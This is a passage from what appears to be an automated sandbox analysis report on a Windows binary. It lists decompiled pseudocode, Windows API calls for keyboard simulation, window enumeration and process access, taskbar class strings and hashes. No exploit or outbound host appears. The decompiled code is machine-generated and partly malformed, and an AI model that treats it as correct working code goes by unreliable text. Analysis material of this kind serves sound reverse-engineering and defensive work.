							 *(_t231 + 0xb8) = MapVirtualKeyA() & 0x000000ff;
							_t188 =  *((intOrPtr*)(_t194 + 0x38));
							if( *((intOrPtr*)(_t188 + 0x1e)) >= r15b ||  *((intOrPtr*)(_t188 + 0x1d)) < r15b) {
							}
							if(r14d == 0) {
								 *(_t194 + 0x280) = r15d;
							} else {
								 *(_t194 + 0x280) = 1;
							}
							if(r14d == 0) {
								r8d = 0;
								E00C81978(0xff, _t145, _t188, _t194, _t217);
							}
							_t201 =  *((intOrPtr*)(_t194 + 0x38));
							r14d = 0x20000000;
							_t187 =  >=  ? _t224 : _t224 | _t246;
							_t224 =  >=  ? _t224 : _t224 | _t246;
							if(_t145 >= 0xa0) {
								if(_t145 <= 0xa1) {
									_t145 = 0x10;
								} else {
									_t64 = _t220 - 0xa4; // -164
									if(_t64 <= 1) {
										_t145 = 0x12;
									}
								}
							}
							r15d = _t145;
							_t100 = 0;
							L54:
							if( *((intOrPtr*)(_t201 + 0x164)) != _t100) {
								_t103 = VkKeyScanExW();
								_t234 =  *(_t231 + 0x48);
								if(E00C81050(_t103 & 0x0000ffff, r12w & 0xffffffff, _t187, _t194, _t229,  *(_t231 + 0x48)) == 0) {
									_t236 =  *(_t231 + 0x50);
									if(_t236 != 0) {
										_t70 = _t231 + 0x50; // 0xff08
										 *((long long*)(_t231 + 0x30)) = _t70;
										r8d = 6;
										 *((intOrPtr*)(_t231 + 0x28)) = 0x3e8;
										 *((intOrPtr*)(_t231 + 0x20)) = 2;
										SendMessageTimeoutA(??, ??, ??, ??, ??, ??, ??);
									}
								}
							}
							_t92 = E00C81324(_t145, _t194, _t234);
							if(_t92 != 0) {
								break;
							} else {
								if( *(_t194 + 0x278) == _t92) {
									_t92 = E00C81264(_t145, _t194, _t194, _t220, _t234);
								}
								if( *(_t194 + 0x278) != 0) {
									L66:
									 *(_t194 + 0x278) =  *(_t194 + 0x278) & 0x00000000;
									break;
								} else {
									if(_t92 == 0) {
										L65:
										_t80 = _t231 + 0x50; // 0xff08
										 *((long long*)(_t231 + 0x30)) = _t80;
										r9d = 0;
										 *((intOrPtr*)(_t231 + 0x28)) = 0x3e8;
										 *((intOrPtr*)(_t231 + 0x20)) = 2;
										_t85 = _t236 + 3; // 0x3
										r8d = _t85;
										SendMessageTimeoutA(??, ??, ??, ??, ??, ??, ??);
										r9d =  *(_t231 + 0xb8) & 0x0000ffff;
										_t92 = PostMessageA(??, ??, ??, ??);
										goto L66;
									}
									_t92 = GetTickCount();
									if(_t92 -  *(_t194 + 0x288) < 0x1f4) {
										goto L66;
									}
									 *(_t194 + 0x288) = _t92;
									E00C81124(_t194, _t243, _t236);
									goto L65;
								}
							}
						}
						_t217 = _t243;
						if(E00C81124(_t194, _t243, _t236) == 0) {
							L17:
							_t92 =  *(_t194 + 0x280);
							if(_t92 != 0) {
								L20:
								_t187 =  *((intOrPtr*)(_t194 + 0x38));
								if( *((intOrPtr*)(_t187 + 0x1c)) >= r15b ||  *((intOrPtr*)(_t187 + 0x1e)) != r15b ||  *((intOrPtr*)(_t187 + 0x1d)) != r15b) {
									L32:
									r15d =  *(_t231 + 0xb8) & 0x0000ffff;
									_t110 = MapVirtualKeyA(??, ??);
									_t201 =  *((intOrPtr*)(_t194 + 0x38));
									 *(_t231 + 0xb8) = _t110 & 0x000000ff;
									_t100 = 0;
									if( *((intOrPtr*)(_t201 + 0x1e)) >= 0 ||  *((intOrPtr*)(_t201 + 0x1d)) < 0) {
									}
									if(r14d == 0) {
										 *(_t194 + 0x284) = _t100;
									} else {
										 *(_t194 + 0x284) = 1;
									}
									goto L54;
								} else {
									L23:
									if(r14d == 0 || r12w == 0) {
										break;
									} else {
										_t187 =  *((intOrPtr*)(_t194 + 0x38));
										r14d = 0x20000000;
										r15d = r12w & 0xffffffff;
										_t215 =  >=  ? _t224 : _t224 | _t246;
										_t224 = _t215;
										_t245 = _t215;
										_t112 = MapVirtualKeyA(??, ??);
										_t100 = 0;
										_t201 =  *((intOrPtr*)(_t194 + 0x38));
										 *(_t231 + 0xb8) = _t112 & 0x000000ff;
										if( *((intOrPtr*)(_t201 + 0x1e)) >= 0 ||  *((intOrPtr*)(_t201 + 0x1d)) < 0) {
										}
										if( *(_t231 + 0x40) != _t100) {
											 *(_t194 + 0x280) = 1;
											_t248 = _t187;
											_t224 =  >=  ? _t245 : _t224 | _t246;
										}
										_t243 =  *((intOrPtr*)(_t231 + 0xa8));
										goto L54;
									}
								}
							}
							if( *(_t194 + 0x284) == r15d) {
								goto L23;
							}
							if(_t92 == 0) {
								goto L32;
							}
							goto L20;
						}
						if(_t229 == 0) {
							_t117 = r12b;
							_t145 = VkKeyScanExA(??, ??) & 0x000000ff;
						} else {
							_t145 =  *(_t231 + 0xb8) & 0x000000ff;
						}
						if(_t145 != 0) {
							goto L38;
						} else {
							goto L17;
						}
					} else {
						_t217 = 0xc94450;
						_t115 = r15d;
						_t216 = 0xc94450;
						L6:
						L6:
						if( *_t216 == _t146) {
							_t198 = _t187 + _t187 * 2;
							_t145 =  *(_t217 + 4 + _t198 * 4) & 0x000000ff;
							if( *((intOrPtr*)(_t217 + 8 + _t198 * 4)) != r15d) {
								asm("dec eax");
							}
						} else {
							goto L7;
						}
						goto L11;
						L7:
						_t115 = _t115 + 1;
						_t216 = _t216 + 0xc;
						if(_t115 < 0x61) {
							goto L6;
						} else {
							goto L11;
						}
					}
				}
				return _t92;
			}

0x00c81508
0x00c81508
0x00c81508
0x00c81508
0x00c8150b
0x00c8150f
0x00c81513
0x00c81514
0x00c81515
0x00c8151a
0x00c8151c
0x00c8151e
0x00c81522
0x00c81525
0x00c81528
0x00c81533
0x00c81538
0x00c8153b
0x00c8153e
0x00c81541
0x00c81547
0x00c8154e
0x00c81553
0x00c81557
0x00c8155e
0x00c81561
0x00c81569
0x00c8156b
0x00c81572
0x00000000
0x00000000
0x00c8157a
0x00c815ba
0x00c815c6
0x00c815d0
0x00c815d2
0x00c815d8
0x00c815d8
0x00c815e7
0x00c815ec
0x00c815f1
0x00c815f6
0x00c815fb
0x00c81779
0x00c8177c
0x00c8177e
0x00c81786
0x00c81786
0x00c8179d
0x00c817a5
0x00c817ad
0x00c817ad
0x00c817c0
0x00c817d5
0x00c817c2
0x00c817c2
0x00c817cc
0x00c817e6
0x00c817e8
0x00c817f0
0x00c817f0
0x00c817f5
0x00c817fc
0x00c81809
0x00c8180d
0x00c81816
0x00c8181e
0x00c81832
0x00c81820
0x00c81820
0x00c81829
0x00c8182b
0x00c8182b
0x00c81829
0x00c8181e
0x00c81837
0x00c8183a
0x00c8183c
0x00c81842
0x00c8184d
0x00c81853
0x00c81866
0x00c81868
0x00c81870
0x00c81876
0x00c8187b
0x00c81880
0x00c81886
0x00c81891
0x00c8189f
0x00c8189f
0x00c81870
0x00c81866
0x00c818aa
0x00c818b1
0x00000000
0x00c818b7
0x00c818bd
0x00c818c4
0x00c818c4
0x00c818d0
0x00c81957
0x00c81957
0x00000000
0x00c818d6
0x00c818d8
0x00c81901
0x00c81905
0x00c8190a
0x00c8190f
0x00c81912
0x00c8191d
0x00c8192b
0x00c8192b
0x00c8192f
0x00c81935
0x00c81951
0x00000000
0x00c81951
0x00c818da
0x00c818ee
0x00000000
0x00000000
0x00c818f3
0x00c818fc
0x00000000
0x00c818fc
0x00c818d0
0x00c818b1
0x00c81601
0x00c8160e
0x00c81635
0x00c81635
0x00c8163d
0x00c81650
0x00c81650
0x00c81658
0x00c81713
0x00c81713
0x00c81721
0x00c8172f
0x00c81733
0x00c8173b
0x00c81740
0x00c81740
0x00c8174f
0x00c81767
0x00c81751
0x00c81751
0x00c8175b
0x00000000
0x00c81672
0x00c81672
0x00c81675
0x00000000
0x00c81685
0x00c81685
0x00c8168c
0x00c81699
0x00c8169d
0x00c816a3
0x00c816a6
0x00c816ad
0x00c816bd
0x00c816bf
0x00c816c3
0x00c816cd
0x00c816cd
0x00c816dd
0x00c816eb
0x00c816ff
0x00c81702
0x00c81702
0x00c81706
0x00000000
0x00c81706
0x00c81675
0x00c81658
0x00c81646
0x00000000
0x00000000
0x00c8164a
0x00000000
0x00000000
0x00000000
0x00c8164a
0x00c81613
0x00c81621
0x00c8162a
0x00c81615
0x00c81615
0x00c81615
0x00c8162f
0x00000000
0x00000000
0x00000000
0x00000000
0x00c81587
0x00c81587
0x00c8158e
0x00c81591
0x00000000
0x00c81594
0x00c81596
0x00c815a5
0x00c815a9
0x00c815b3
0x00c815b5
0x00c815b5
0x00000000
0x00000000
0x00000000
0x00000000
0x00c81598
0x00c81598
0x00c8159a
0x00c815a1
0x00000000
0x00c815a3
0x00000000
0x00c815a3
0x00c815a1
0x00c8157a
0x00c81975

APIs

Part of subcall function 00C7BEC4: GetClassNameA.USER32 ref: 00C7BED6
Part of subcall function 00C7BEC4: lstrcmpiA.KERNEL32 ref: 00C7BEE8

GetWindowThreadProcessId.USER32 ref: 00C815CA
GetKeyboardLayout.USER32 ref: 00C815D2
VkKeyScanExA.USER32 ref: 00C81624
MapVirtualKeyA.USER32 ref: 00C816AD
MapVirtualKeyA.USER32 ref: 00C81721
VkKeyScanExW.USER32(?,?,?,?,?,00C814ED), ref: 00C8184D
SendMessageTimeoutA.USER32 ref: 00C8189F
GetTickCount.KERNEL32 ref: 00C818DA
SendMessageTimeoutA.USER32 ref: 00C8192F
PostMessageA.USER32 ref: 00C81951

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Message$ScanSendTimeoutVirtual$ClassCountKeyboardLayoutNamePostProcessThreadTickWindowlstrcmpi
String ID:
API String ID: 3949878538-0
Opcode ID: c42f23df41b87a760b4589c0f5822561c428a73b1481fb86c01f744ca27fc07a
Instruction ID: f4b160dc1e7f3b2458fca7eacac6acb5579c68d968aceecaaf5f7fb92ee286c2
Opcode Fuzzy Hash: c42f23df41b87a760b4589c0f5822561c428a73b1481fb86c01f744ca27fc07a
Instruction Fuzzy Hash: E4B1043270479586EB64EF26A4043AA37EAF780B88F5C4039DE4A57764DF39C987D708

Uniqueness

Uniqueness Score: -1.00%

Function 00C78190, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 134COMMON

Download Yara Rule

Strings

DllGetClassObject, xrefs: 00C782FD

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: DllGetClassObject
API String ID: 0-1075368562
Opcode ID: 944b1b52538e065f2f049a2512e645bfd60fdd8e15ba8818f1b2d61931b6c5db
Instruction ID: f4fddc1274dd1c7a366a2c22375beb0ee05b4cc1d83da47d3c7ec7ff24ab19fe
Opcode Fuzzy Hash: 944b1b52538e065f2f049a2512e645bfd60fdd8e15ba8818f1b2d61931b6c5db
Instruction Fuzzy Hash: 60519C25384B4182EE158B1AE588329A7A1F788FE5F488222CF5E17B39DF7CC549C744

Uniqueness

Uniqueness Score: -1.00%

Function 00C828F4, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 109
COMMON

Download Yara Rule

C-Code - Quality: 21%

			E00C828F4(void* __edx, long long __rbx, void* __rcx, long long __rdx, long long __rsi, long long __rbp, long long* __r8, void* __r9, intOrPtr _a16) {
				void* _v24;
				void* _v84;
				intOrPtr _v88;
				int _t36;
				intOrPtr _t42;
				long long _t48;
				long long _t51;
				intOrPtr* _t53;
				void* _t74;
				long long _t78;
				long long _t81;
				void* _t85;

				_t85 = __r9;
				_t48 = _t81;
				 *((long long*)(_t48 + 8)) = __rbx;
				 *((long long*)(_t48 + 0x18)) = __rbp;
				 *((long long*)(_t48 + 0x20)) = __rsi;
				 *((long long*)(_t48 + 0x10)) = __rdx;
				_t88 = __r8;
				_t74 = __rcx;
				if(( *(__rcx + 0xb8) & 0x00001000) != 0) {
					_t36 = WindowFromPoint();
					_t51 = _t48;
					if(__r8 != 0) {
						_t36 = GetAncestor();
						_t48 =  ==  ? _t51 : _t48;
						 *__r8 = _t48;
					}
					if(_t51 !=  *((intOrPtr*)(_t74 + 0xe8))) {
						if(_t51 == 0) {
							goto L18;
						} else {
							goto L26;
						}
						while(1) {
							L26:
							_t36 = E00C7B9A8(_t51, _a16);
							if(_t48 == 0 || _t48 == _t51) {
								goto L18;
							}
							_t51 = _t48;
						}
					} else {
						_v88 = 0x3c;
						_t36 = GetWindowInfo(??, ??);
						if(_t36 != 0) {
							_t36 = PtInRect();
							if(_t36 != 0) {
								_t51 =  *((intOrPtr*)(_t74 + 0xc8));
							}
						}
					}
					goto L18;
				} else {
					r8d = 7;
					ChildWindowFromPointEx(??, ??, ??);
					_t78 = _t48;
					EnterCriticalSection(??);
					_t53 =  *((intOrPtr*)(__rcx + 0x1d0));
					while(_t53 != 0) {
						if( *_t53 == _t78) {
							break;
						} else {
							_t53 =  *((intOrPtr*)(_t53 + 0x38));
							continue;
						}
					}
					if(_t53 == 0) {
						L15:
						LeaveCriticalSection();
						if(_t88 != 0) {
							 *_t88 = _t78;
						}
						_t36 = E00C7C3A8(_t48, _t78, _a16);
						_t51 = _t48;
						L18:
						return _t36;
					}
					_t42 =  *((intOrPtr*)(_t53 + 0x2c));
					while(1) {
						_t53 =  *((intOrPtr*)(_t53 + 0x38));
						if(_t53 == 0) {
							goto L15;
						}
						if( *((intOrPtr*)(_t53 + 0x18)) == 0 &&  *((intOrPtr*)(_t53 + 0x30)) == 0 &&  *((intOrPtr*)(_t53 + 0x2c)) >= _t42 && E00C7BB64(_t48, _t53, _t74 + 0x88,  *_t53, _t85) >= 0 && ( *(_t53 + 0x10) & 0x40000000) == 0 && PtInRect() != 0) {
							_t78 =  *_t53;
						}
					}
					goto L15;
				}
			}

0x00c828f4
0x00c828f4
0x00c828f7
0x00c828fb
0x00c828ff
0x00c82903
0x00c8291a
0x00c8291d
0x00c82920
0x00c82a00
0x00c82a06
0x00c82a0c
0x00c82a16
0x00c82a1f
0x00c82a23
0x00c82a23
0x00c82a2d
0x00c82a77
0x00000000
0x00000000
0x00000000
0x00000000
0x00c82a7d
0x00c82a7d
0x00c82a88
0x00c82a90
0x00000000
0x00000000
0x00c82a9f
0x00c82a9f
0x00c82a2f
0x00c82a3b
0x00c82a43
0x00c82a4b
0x00c82a5a
0x00c82a62
0x00c82a68
0x00c82a68
0x00c82a62
0x00c82a4b
0x00000000
0x00c82926
0x00c8292d
0x00c82933
0x00c82940
0x00c82946
0x00c8294c
0x00c8295e
0x00c82958
0x00000000
0x00c8295a
0x00c8295a
0x00000000
0x00c8295a
0x00c82958
0x00c82966
0x00c829bc
0x00c829bf
0x00c829c8
0x00c829ca
0x00c829ca
0x00c829d8
0x00c829dd
0x00c829e0
0x00c829fc
0x00c829fc
0x00c82968
0x00c829b3
0x00c829b3
0x00c829ba
0x00000000
0x00000000
0x00c82971
0x00c829b0
0x00c829b0
0x00c82971
0x00000000
0x00c829b3

APIs

ChildWindowFromPointEx.USER32 ref: 00C82933
EnterCriticalSection.KERNEL32 ref: 00C82946
LeaveCriticalSection.KERNEL32 ref: 00C829BF

Part of subcall function 00C7BB64: GetParent.USER32 ref: 00C7BCA4

PtInRect.USER32 ref: 00C829A6
WindowFromPoint.USER32 ref: 00C82A00
GetAncestor.USER32 ref: 00C82A16
GetWindowInfo.USER32 ref: 00C82A43
PtInRect.USER32 ref: 00C82A5A

Strings

<, xrefs: 00C82A3B

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Window$CriticalFromPointRectSection$AncestorChildEnterInfoLeaveParent
String ID: <
API String ID: 3358615102-4251816714
Opcode ID: da555e7cd2ea4ce98741422fbed2a14a0cf4e3a6b0a623897eb3878cf9e914c4
Instruction ID: 29fa87c8d83e28abb18038dfc51c5bfc63a9c669d20c562909d3b83345fa2954
Opcode Fuzzy Hash: da555e7cd2ea4ce98741422fbed2a14a0cf4e3a6b0a623897eb3878cf9e914c4
Instruction Fuzzy Hash: 1B413632301A5096EF68AF22D5487AD73A4F748F88F488525CEAD57714DF38CA9AC748

Uniqueness

Uniqueness Score: -1.00%

Function 00C7AEC8, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 92stringmemoryCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(?,?,?,00C7AE5F), ref: 00C7AF07
StrCmpNIW.SHLWAPI(?,?,?,00C7AE5F), ref: 00C7AF41
StrCmpNIW.SHLWAPI(?,?,?,00C7AE5F), ref: 00C7AF67
StrChrW.SHLWAPI(?,?,?,00C7AE5F), ref: 00C7AF81
StrCmpNIW.SHLWAPI(?,?,?,00C7AE5F), ref: 00C7AFA1
lstrcmpiW.KERNEL32(?,?,?,00C7AE5F), ref: 00C7AFA9
HeapFree.KERNEL32(?,?,?,00C7AE5F), ref: 00C7AFDC

Strings

\Registry\USER, xrefs: 00C7AF5D
\Registry\Machine, xrefs: 00C7AF37

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: lstrcmpi$FreeHeap
String ID: \Registry\Machine$\Registry\USER
API String ID: 4129639105-1053235272
Opcode ID: e291ea235808b443d9d5fc9bb8431afeca079be17f62087af12fe3fd8a23e32b
Instruction ID: e567855ed08e488165b7fd1ee6f426973c2c602a4b90930632c20bacaafb721f
Opcode Fuzzy Hash: e291ea235808b443d9d5fc9bb8431afeca079be17f62087af12fe3fd8a23e32b
Instruction Fuzzy Hash: 703137A2301B5081EB259FA2E840B6E67A0F785FD4F58C115DE5D87B58DF38CA46C306

Uniqueness

Uniqueness Score: -1.00%

Function 00C80764, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 81stringmemoryCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32 ref: 00C807C5
OpenProcess.KERNEL32 ref: 00C807DB
OpenProcess.KERNEL32 ref: 00C807F5
lstrcmpiW.KERNEL32 ref: 00C8081D
HeapFree.KERNEL32 ref: 00C80836
CloseHandle.KERNEL32 ref: 00C80843
Process32NextW.KERNEL32 ref: 00C80854
CloseHandle.KERNEL32 ref: 00C80867

Strings

Winsta0\Default, xrefs: 00C80813

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CloseHandleOpenProcesslstrcmpi$FreeHeapNextProcess32
String ID: Winsta0\Default
API String ID: 1597940222-2867368725
Opcode ID: 010c9d0f6f82a17cacd812db3abcffce7f80f621337c7c0cfc1e694989eaa754
Instruction ID: 8b1b94d1dcb9b39471174300d868b33b10ff13f121c0384675a2e78bafa418b8
Opcode Fuzzy Hash: 010c9d0f6f82a17cacd812db3abcffce7f80f621337c7c0cfc1e694989eaa754
Instruction Fuzzy Hash: 9321A721704B4085FA64EB23E80471A6395EB88FE4F588330DD6D47BA9EF38C94AC744

Uniqueness

Uniqueness Score: -1.00%

Function 00C7BA38, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 80
COMMON

Download Yara Rule

C-Code - Quality: 15%

			E00C7BA38(void* __eflags, void* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rsi, void* __r8, void* __r9, long long _a8, long long _a16) {
				signed char _v32;
				signed int _v36;
				intOrPtr _v72;
				signed char _t22;
				signed int _t29;
				void* _t38;
				void* _t41;
				void* _t49;
				void* _t53;
				void* _t70;
				void* _t72;
				void* _t77;
				void* _t78;

				_t78 = __r9;
				_t77 = __r8;
				_t49 = __rax;
				_a8 = __rbx;
				_a16 = __rsi;
				_t53 = __rdx;
				_t72 = __rcx;
				if(E00C7C050(__rax, __rdx, __rcx, __rdx, __rcx) == 0) {
					L18:
					_t22 = 0;
					__eflags = 0;
					L19:
					return _t22;
				}
				_t38 = _t53 -  *((intOrPtr*)(_t72 + 0x58));
				if(_t38 == 0) {
					goto L18;
				}
				__imp__GetWindowLongPtrA();
				asm("dec eax");
				if(_t38 >= 0) {
					goto L18;
				}
				_t22 = GetLastActivePopup();
				if(__rax == 0 || __rax == _t53) {
					GetWindow();
					GetWindow(??, ??);
					_t70 = _t49;
					do {
						_v72 = 0x3c;
						GetWindowInfo(??, ??);
						GetWindow(??, ??);
						_t41 = _t49 - _t53;
						if(_t41 != 0) {
							goto L14;
						}
						_t29 = _v36;
						asm("bt eax, 0x1c");
						if(_t41 >= 0) {
							goto L14;
						}
						asm("bt eax, 0x1d");
						if(_t41 >= 0 && (_t29 & 0x00000020) == 0 && ((_v32 & 0x00000001) != 0 || (_t29 & 0x80c80000) != 0)) {
							_t22 = E00C7BB64(_t49, _t53, _t72, _t70, _t78);
							if((_t22 & 0x00000005) != 0 || _t70 == _t53) {
								goto L14;
							} else {
								goto L19;
							}
						}
						L14:
						GetWindow();
						_t70 = _t49;
						_t47 = _t49;
					} while (_t49 != 0);
					GetWindow();
					_t22 = E00C7BA38(_t47, _t49, _t53, _t72, _t49, _t72, _t77, _t78);
					if(_t49 == 0) {
					}
				}
			}

0x00c7ba38
0x00c7ba38
0x00c7ba38
0x00c7ba38
0x00c7ba3d
0x00c7ba47
0x00c7ba4a
0x00c7ba54
0x00c7bb50
0x00c7bb50
0x00c7bb50
0x00c7bb52
0x00c7bb61
0x00c7bb61
0x00c7ba5a
0x00c7ba5e
0x00000000
0x00000000
0x00c7ba6c
0x00c7ba72
0x00c7ba77
0x00000000
0x00000000
0x00c7ba80
0x00c7ba89
0x00c7ba9d
0x00c7baab
0x00c7bab1
0x00c7bab4
0x00c7bab9
0x00c7bac4
0x00c7bad2
0x00c7bad8
0x00c7badb
0x00000000
0x00000000
0x00c7badd
0x00c7bae1
0x00c7bae5
0x00000000
0x00000000
0x00c7bae7
0x00c7baeb
0x00c7bb05
0x00c7bb0c
0x00000000
0x00c7bb4b
0x00000000
0x00c7bb4b
0x00c7bb0c
0x00c7bb13
0x00c7bb1b
0x00c7bb21
0x00c7bb24
0x00c7bb24
0x00c7bb2f
0x00c7bb3b
0x00c7bb43
0x00c7bb43
0x00c7bb43

APIs

Part of subcall function 00C7C050: IsWindow.USER32 ref: 00C7C06A
Part of subcall function 00C7C050: GetAncestor.USER32(?,?,?,00C7C19D), ref: 00C7C093

GetWindowLongPtrA.USER32 ref: 00C7BA6C
GetLastActivePopup.USER32 ref: 00C7BA80
GetWindow.USER32 ref: 00C7BA9D
GetWindow.USER32 ref: 00C7BAAB
GetWindowInfo.USER32 ref: 00C7BAC4
GetWindow.USER32 ref: 00C7BAD2
GetWindow.USER32 ref: 00C7BB1B
GetWindow.USER32 ref: 00C7BB2F

Strings

<, xrefs: 00C7BAB9

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Window$ActiveAncestorInfoLastLongPopup
String ID: <
API String ID: 906851337-4251816714
Opcode ID: 539fc9f3fb8f886a674c7fe3b83c360f55a3d397cfa06b27d94c64a4624ab122
Instruction ID: eee58885ab661ae1bb148e714f20b47a2343ee4a0e8a1cc64d506de295e1c726
Opcode Fuzzy Hash: 539fc9f3fb8f886a674c7fe3b83c360f55a3d397cfa06b27d94c64a4624ab122
Instruction Fuzzy Hash: EF216B2130574487FE309B16E64432A63A1EB89BD4F58C524EEAE47B5CEF7CCD4A8705

Uniqueness

Uniqueness Score: -1.00%

Function 00C65684, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 73threadstringCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00C656D4
GetMappedFileNameA.PSAPI ref: 00C656EB
PathStripPathA.SHLWAPI ref: 00C656F9
lstrcmpiA.KERNEL32 ref: 00C6570B
GetTickCount.KERNEL32 ref: 00C65741
GetTickCount.KERNEL32 ref: 00C6574D
GetCurrentThread.KERNEL32 ref: 00C65771
TerminateThread.KERNEL32 ref: 00C6577C

Strings

windows.immersiveshell.serviceprovider.dll, xrefs: 00C656FF

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CountCurrentPathThreadTick$FileMappedNameProcessStripTerminatelstrcmpi
String ID: windows.immersiveshell.serviceprovider.dll
API String ID: 84710471-1793758754
Opcode ID: c757c07dada5ae0178d8b665c6b00b43cf9509866eac1f24c1031e16ac57a28d
Instruction ID: ba193b59bb5845501ee7c8362632d8859d32636a16002e202a929b3938c55027
Opcode Fuzzy Hash: c757c07dada5ae0178d8b665c6b00b43cf9509866eac1f24c1031e16ac57a28d
Instruction Fuzzy Hash: 1A312735625F41CAF7218F62E848F5933A4F758B91F958226DE5A83760CF3DC949CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00C69C40, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 69stringCOMMON

Download Yara Rule

APIs

IsBadStringPtrA.KERNEL32 ref: 00C69C98

Part of subcall function 00C69B2C: GetWindowLongPtrA.USER32 ref: 00C69B9A
Part of subcall function 00C69B2C: EnterCriticalSection.KERNEL32 ref: 00C69BCA
Part of subcall function 00C69B2C: LeaveCriticalSection.KERNEL32 ref: 00C69BF7
Part of subcall function 00C69B2C: SetWindowLongPtrA.USER32 ref: 00C69C06
Part of subcall function 00C69B2C: GetWindowLongPtrA.USER32 ref: 00C69C15

GetClassNameA.USER32 ref: 00C69CD3
lstrcmpiA.KERNEL32 ref: 00C69CEC
lstrcmpiA.KERNEL32 ref: 00C69D0E
lstrcmpiA.KERNEL32 ref: 00C69D22
lstrcmpiA.KERNEL32 ref: 00C69D36

Strings

TrayNotifyWnd, xrefs: 00C69D2F
#32770, xrefs: 00C69CE5
MSTaskSwWClass, xrefs: 00C69D07, 00C69D1B

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: lstrcmpi$LongWindow$CriticalSection$ClassEnterLeaveNameString
String ID: #32770$MSTaskSwWClass$TrayNotifyWnd
API String ID: 1160596247-1364136895
Opcode ID: adeeccb7babc074936113cf2274e740870c569e2331220df0253326f0c852bcb
Instruction ID: 1976a3941b68adc75c05c9ee24880c2858a385f147e3412b1a3a7d8e688f1652
Opcode Fuzzy Hash: adeeccb7babc074936113cf2274e740870c569e2331220df0253326f0c852bcb
Instruction Fuzzy Hash: FC21332231464196FB308F26F850766B7A9FB95BC0F4C8135D99D87A68EF3CC645C718

Uniqueness

Uniqueness Score: -1.00%

Function 00C63A18, Relevance: 15.2, APIs: 10, Instructions: 153memorystringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32 ref: 00C63AE8
lstrlenW.KERNEL32 ref: 00C63AFE
HeapAlloc.KERNEL32 ref: 00C63B16
lstrcpyW.KERNEL32 ref: 00C63B39
lstrcatW.KERNEL32 ref: 00C63B49
lstrcatW.KERNEL32 ref: 00C63B5A
HeapFree.KERNEL32 ref: 00C63BD3

Part of subcall function 00C7797C: lstrlenW.KERNEL32(?,?,?,00C63778), ref: 00C779A9
